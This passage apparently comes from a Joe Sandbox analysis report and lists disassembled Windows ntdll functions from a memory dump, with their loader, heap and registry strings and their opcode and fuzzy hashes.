                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36E1C234604741DFE766CF28C884B2ABBE1BF94714F140A1EF6A58B2E1D778D949CB42
                                                                                                                                                                                                                                  Function 014AB5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                                                                                                  • API String ID: 0-1145731471
                                                                                                                                                                                                                                  • Opcode ID: 86b9341683c735d010d80b5c54fb2ba0689364f42d041d33dc61a1328c836ec3
                                                                                                                                                                                                                                  • Instruction ID: 9bcf9856e4a11bee3648cdd08f4953236ff00a04f38e39ccf3cc225526cafc0d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86b9341683c735d010d80b5c54fb2ba0689364f42d041d33dc61a1328c836ec3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88B17C75A00A458FDB26CFA9C890BAEBBB5FF54714F25852AE511EB7A0D730E841CF10
                                                                                                                                                                                                                                  Function 0152330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                                                                                  • API String ID: 0-2391371766
                                                                                                                                                                                                                                  • Opcode ID: 8edcec3409d0adf94d91ca6ba2235f753135d057ebd9ac4b064dd7a3970bef7c
                                                                                                                                                                                                                                  • Instruction ID: 9c0f8d7c5991e93ea537f8995aecb11cd37c267e279658568a7b59c350b4af99
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8edcec3409d0adf94d91ca6ba2235f753135d057ebd9ac4b064dd7a3970bef7c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 92B19F72604325AFE761DF55C884F6BB7ECBB59750F01092AFA509F290D778E808CB92
                                                                                                                                                                                                                                  Function 0149A147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                                                                                                                                  • API String ID: 0-2779062949
                                                                                                                                                                                                                                  • Opcode ID: 0b8c49d48050cc9cd72c12cfd3e03ad8ca08caccc56c69ad4781a7a7c1c55f17
                                                                                                                                                                                                                                  • Instruction ID: b91960af3c89dd4e91341014f3b3ab2cb986cf732b28394c7a5be374cc54a006
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b8c49d48050cc9cd72c12cfd3e03ad8ca08caccc56c69ad4781a7a7c1c55f17
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50A15B719012299BDF31DF68CC88BAAB7B8EF14710F1005EAEA09A7260D7759E85CF50
                                                                                                                                                                                                                                  Function 0153327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                                                                                                                                  • API String ID: 0-318774311
                                                                                                                                                                                                                                  • Opcode ID: 9e323dd259f69490a66e640f8c6b6c0bb6aa0425f00f490058fd5b799f60b1e7
                                                                                                                                                                                                                                  • Instruction ID: 138a95714b4a6035dfd5a0c92a7f2af21ce020bc75f1c0f8e52adbb77449c808
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e323dd259f69490a66e640f8c6b6c0bb6aa0425f00f490058fd5b799f60b1e7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E818E71608341AFE761DB19C884B6EBBE8FF94750F04492DFA519B3A0DB74D900CB62
                                                                                                                                                                                                                                  Function 01527090 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                                                                                                                                                                  • API String ID: 0-3870751728
                                                                                                                                                                                                                                  • Opcode ID: aed0ebb9ea125e182cddf7af6bfccca15749c31a43407652689a44f1ddc71582
                                                                                                                                                                                                                                  • Instruction ID: d1676914d9527b40094aa755f7670970dfb89c798a7f260106541c05010858f4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aed0ebb9ea125e182cddf7af6bfccca15749c31a43407652689a44f1ddc71582
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6915DB1E002169FDB14CFA9C480BADBBF1FFAD314F24816AE905AB391E7759841CB54
                                                                                                                                                                                                                                  Function 014AB360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                                                                  • API String ID: 0-373624363
                                                                                                                                                                                                                                  • Opcode ID: 9d097145df78280b9764f417c19e14cf390af256c655bcbc08e8c9fc1c3598eb
                                                                                                                                                                                                                                  • Instruction ID: 2f8014815e4992a8e5f00ca3b3ecd33fcdb2ae84e1e2c484a5d99a2b3ca14a56
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d097145df78280b9764f417c19e14cf390af256c655bcbc08e8c9fc1c3598eb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6191CF31A04655CFEB22CF98D4507AEBBB0FF15318F56419AE951AB3E0D3789A41CB90
                                                                                                                                                                                                                                  Function 0157B2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • GlobalizationUserSettings, xrefs: 0157B3B4
                                                                                                                                                                                                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 0157B3AA
                                                                                                                                                                                                                                  • TargetNtPath, xrefs: 0157B3AF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                                                                                  • API String ID: 0-505981995
                                                                                                                                                                                                                                  • Opcode ID: 67552c10719e34848a369920ad8be7fdf33a49da959a1671069380d79b40eda5
                                                                                                                                                                                                                                  • Instruction ID: a4639faa1a32a57aae137c9ea354bbe4be4bac004683f60fe157bda4ff94ef65
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 67552c10719e34848a369920ad8be7fdf33a49da959a1671069380d79b40eda5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75618272D41229ABDB31DF55DC89BD9B7B9BB14710F0101E9EA08AB260D774DE84CF90
                                                                                                                                                                                                                                  Function 0149F75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 014FE455
                                                                                                                                                                                                                                  • HEAP: , xrefs: 014FE442
                                                                                                                                                                                                                                  • HEAP[%wZ]: , xrefs: 014FE435
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                                                                  • API String ID: 0-1340214556
                                                                                                                                                                                                                                  • Opcode ID: 3aa39f616ed79498878d3dfeeaf34642706df925fa44a55f08f0cb7f5e2e568d
                                                                                                                                                                                                                                  • Instruction ID: b35b1a5e907edc18e2df9ded52e9f43967f5dfed2d23c7367b356fe273c7bc39
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3aa39f616ed79498878d3dfeeaf34642706df925fa44a55f08f0cb7f5e2e568d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5851C331604685AFEB12DBA9C888F9ABFF8FF14604F0540AAE651DB772D374E905CB50
                                                                                                                                                                                                                                  Function 014C1514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 0150A396
                                                                                                                                                                                                                                  • LdrpCompleteMapModule, xrefs: 0150A39D
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrmap.c, xrefs: 0150A3A7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                                                                  • API String ID: 0-1676968949
                                                                                                                                                                                                                                  • Opcode ID: 4ccdbce0a3adb7ba478785d072adc6d7490f83ed173390d0546923145ad740aa
                                                                                                                                                                                                                                  • Instruction ID: 1bdb4732316b293e036dcf430f9705772a8e31aa44e45084fcb5fc4e454358cc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ccdbce0a3adb7ba478785d072adc6d7490f83ed173390d0546923145ad740aa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D51E435A00741DBEB22CBADC944B6A7BA4BB20F14F19055AE9529F7F2D770E900CB44
                                                                                                                                                                                                                                  Function 0149753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                                                                  • API String ID: 0-1151232445
                                                                                                                                                                                                                                  • Opcode ID: 5eabaeb47018508711dd1deca7f09566c91a74c2b53ea9e44a48fd4794d0ca29
                                                                                                                                                                                                                                  • Instruction ID: f13431a3be7ca559b694246c618c143737d7a14c17b2ff088cf1d81f51a5bcb7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5eabaeb47018508711dd1deca7f09566c91a74c2b53ea9e44a48fd4794d0ca29
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1841C3342502808FEF25CB1DC088B767FA19F01616F3844AFD68A8BBB6C675D847CB61
                                                                                                                                                                                                                                  Function 014D15EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 01511943
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 01511954
                                                                                                                                                                                                                                  • LdrpAllocateTls, xrefs: 0151194A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                                                  • API String ID: 0-4274184382
                                                                                                                                                                                                                                  • Opcode ID: c3a31a5ef61eb7b946b41619f51e78758c043cc6677a07868236f48faea781d6
                                                                                                                                                                                                                                  • Instruction ID: f730540e11e5cde1c47f8ad637feb2db0d7ce35c4a68479599145004e34fce90
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3a31a5ef61eb7b946b41619f51e78758c043cc6677a07868236f48faea781d6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6141BF71A00606EFDB15DFA9C891BAEBBF1FF68700F05851AE905AB360D734A801CF50
                                                                                                                                                                                                                                  Function 015243D5 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01524508
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 01524519
                                                                                                                                                                                                                                  • LdrpCheckRedirection, xrefs: 0152450F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                  • API String ID: 0-3154609507
                                                                                                                                                                                                                                  • Opcode ID: 698a4bfefea5c195e2d4b673a217c69a714c6677bb5e759983fab14af8a901bd
                                                                                                                                                                                                                                  • Instruction ID: d8db4ed369b9c4bd5c03d77104a222a637003dde754f1c8808a303620bd40f3a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 698a4bfefea5c195e2d4b673a217c69a714c6677bb5e759983fab14af8a901bd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF41C3336047319FCB21CF5CD940A2A7BE4BF8A650F060A59ED999F396D730E8008BD1
                                                                                                                                                                                                                                  Function 014D32C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • SXS: %s() passed the empty activation context data, xrefs: 01512808
                                                                                                                                                                                                                                  • Actx , xrefs: 014D32CC
                                                                                                                                                                                                                                  • RtlCreateActivationContext, xrefs: 01512803
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                                                                                  • API String ID: 0-859632880
                                                                                                                                                                                                                                  • Opcode ID: 88ac9d003a78ecf4f29b36c9225f9dc2fa027e64cbcb6682b5e2ffbffaa3f110
                                                                                                                                                                                                                                  • Instruction ID: 87955548357f22e2ebcb7d396e2318b6109a88fbfd46949fd8ebe43f412f5b46
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88ac9d003a78ecf4f29b36c9225f9dc2fa027e64cbcb6682b5e2ffbffaa3f110
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0311272600306ABEF12DF59D8A0F9A7BA4BB54710F25846AFD059F3A5CB70D806CBD1
                                                                                                                                                                                                                                  Function 0152B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • GlobalFlag, xrefs: 0152B30F
                                                                                                                                                                                                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0152B2B2
                                                                                                                                                                                                                                  • @, xrefs: 0152B2F0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                                                                                                                                                                                  • API String ID: 0-4192008846
                                                                                                                                                                                                                                  • Opcode ID: 8fd45c08ec2a0cc01f79e2d47eb784c5c5ca20337aa225a80c797a4001026bd0
                                                                                                                                                                                                                                  • Instruction ID: 04eb87b99644625f7a19157252664730195571cf051e190e1b2dedd71a05ee30
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fd45c08ec2a0cc01f79e2d47eb784c5c5ca20337aa225a80c797a4001026bd0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD313072900219AFDB10EF95CC84AEEBBBCFF64744F54446EEA01AB191D7749E048BA0
                                                                                                                                                                                                                                  Function 014D1527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • LdrpInitializeTls, xrefs: 01511851
                                                                                                                                                                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 0151185B
                                                                                                                                                                                                                                  • DLL "%wZ" has TLS information at %p, xrefs: 0151184A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                                                                  • API String ID: 0-931879808
                                                                                                                                                                                                                                  • Opcode ID: 9ab79be4c16ae148329cc9fd5cf88e954484209e4b712ec02099ac8de5a4ffa5
                                                                                                                                                                                                                                  • Instruction ID: a30ab7c45b29594a82033f9af6c5c90802763c13c461884dfdf0d89650c4ad1f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ab79be4c16ae148329cc9fd5cf88e954484209e4b712ec02099ac8de5a4ffa5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8315F71A10201BBEF229B59CCA1F6A77A8FB50B44F46051BE9027F2A0E774ED058791
                                                                                                                                                                                                                                  Function 014E1190 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • @, xrefs: 014E11C5
                                                                                                                                                                                                                                  • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 014E119B
                                                                                                                                                                                                                                  • BuildLabEx, xrefs: 014E122F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                                                                                  • API String ID: 0-3051831665
                                                                                                                                                                                                                                  • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                                                  • Instruction ID: 8f4fae0d2d1ddaf2678b660414a17764429dce933e2ee73c402ddb9e355de45d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A931A4B290021ABBDF12DB95CC48EEEBBBDEB64615F004026E614A7270D770DA058BA0
                                                                                                                                                                                                                                  Function 014B51C0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$@
                                                                                                                                                                                                                                  • API String ID: 0-149943524
                                                                                                                                                                                                                                  • Opcode ID: d9a1683082907d4742d4c2fda9ee750b1bd43c3234457311f1e21cd10f5ddd52
                                                                                                                                                                                                                                  • Instruction ID: 14291a7f1acc6f97a27b53553754677bdae4686a4931eeac429d866348d7027b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9a1683082907d4742d4c2fda9ee750b1bd43c3234457311f1e21cd10f5ddd52
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 31327B705083518BDB258F59C4C4BBFFBE1BF88600F14492EFA958B2A0E774D995CB62
                                                                                                                                                                                                                                  Function 0152174B Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$AddD
                                                                                                                                                                                                                                  • API String ID: 0-2525844869
                                                                                                                                                                                                                                  • Opcode ID: 4e5ba3cbf3c9629668dcaf70b37f9287a34462b624c85ab05b567e61d654938e
                                                                                                                                                                                                                                  • Instruction ID: 375ab9606caf829251bd12fc243dce77e5a4e57dc73b7712b99e3e9de54b218e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e5ba3cbf3c9629668dcaf70b37f9287a34462b624c85ab05b567e61d654938e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FA16D72204355AFE315CB14C885FAFB7EDFB85700F144A2EF5958A290E7B0E905CBA2
                                                                                                                                                                                                                                  Function 0151E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID: Legacy$UEFI
                                                                                                                                                                                                                                  • API String ID: 2994545307-634100481
                                                                                                                                                                                                                                  • Opcode ID: b78f432237be2284774cbaf397bb9056f4794092bfe82128d89871b0a43e31e3
                                                                                                                                                                                                                                  • Instruction ID: b8d3654777a1e0602cd837c5b0b303f87bb7eb939be2fb35ff1798adcd480b25
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b78f432237be2284774cbaf397bb9056f4794092bfe82128d89871b0a43e31e3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED619171A402099FEB16DFA9C841BADBBF4FF54700F15442EEA49EB255E730E941CB10
                                                                                                                                                                                                                                  Function 0157B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 0157B5C4
                                                                                                                                                                                                                                  • RedirectedKey, xrefs: 0157B60E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
